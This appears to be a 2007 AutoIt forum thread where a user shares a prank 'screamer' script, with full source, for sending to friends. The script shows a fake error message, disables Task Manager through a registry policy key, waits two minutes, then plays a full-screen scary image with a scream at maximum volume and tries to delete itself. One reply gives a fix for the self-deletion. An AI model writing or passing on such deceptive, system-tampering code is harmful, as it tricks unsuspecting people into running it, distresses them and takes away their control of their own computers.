Sippeangelo Posted July 13, 2007 Posted July 13, 2007 Here is my short, yet funny, script!expandcollapse popup#cs ---------------------------------------------------------------------------- AutoIt Version: 3.2.4.9 Author: Sippeangelo Script Function: Send this to your friends! First it will Disable the Task Manager. You get a error message. You think it did not work. Now nothing will happen for 2 minutes. After these 2 minutes a face will cover the screen and scream the heck out of you! Then it will enable Task manager and delete itself. It have actually never been there. It's just your imagination. #ce ---------------------------------------------------------------------------- #include <GUIConstants.au3> #NoTrayIcon FileInstall ("C:\Scream.jpg", @tempdir & "\G7.jpg") FileInstall ("C:\Scream.wav", @tempdir & "\G7.wav") $size = WinGetClientSize ("Program Manager") GUICreate("PWNED!", $size[0], $size[1], -1, -1, $WS_POPUP) GUICtrlCreatePic (@tempdir & "\G7.jpg", 0, 0, $size[0], $size[1]) RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") MsgBox(0+16, "889AuXX0", @ScriptFullPath & @CRLF & "Error running compl executable (Code: 889AuXX0)" & @CRLF & @CRLF & "Program not executed") Sleep(120000) SoundSetWaveVolume(100) GUISetState (@SW_SHOW) SoundPlay(@tempdir & "\G7.wav") Sleep(1500) GUISetState (@SW_HIDE) RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0") FileDelete(@ScriptFullPath)You MUST have the .wav file and the .jpg file in your C:\ dir before compile if you don't wanna use the exe file provided!This is what is going to happen:1. When they run it, a strange error message is showing up. They press ok and think it did not work.2. The Task Manager gets disabled.3. After 2 minutes a fullscreen image of a face poops up and you hear a awful screem on max volume in your speakers.4. The script quits and the Task Manager gets enabled again and the .exe deletes itself.I did not have balls to test it so i leave that to you.Enjoy!Screamer.zip
poisonkiller Posted July 13, 2007 Posted July 13, 2007 This line doesn't work: FileDelete(@ScriptFullPath) Look up _SelfDelete instead.
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now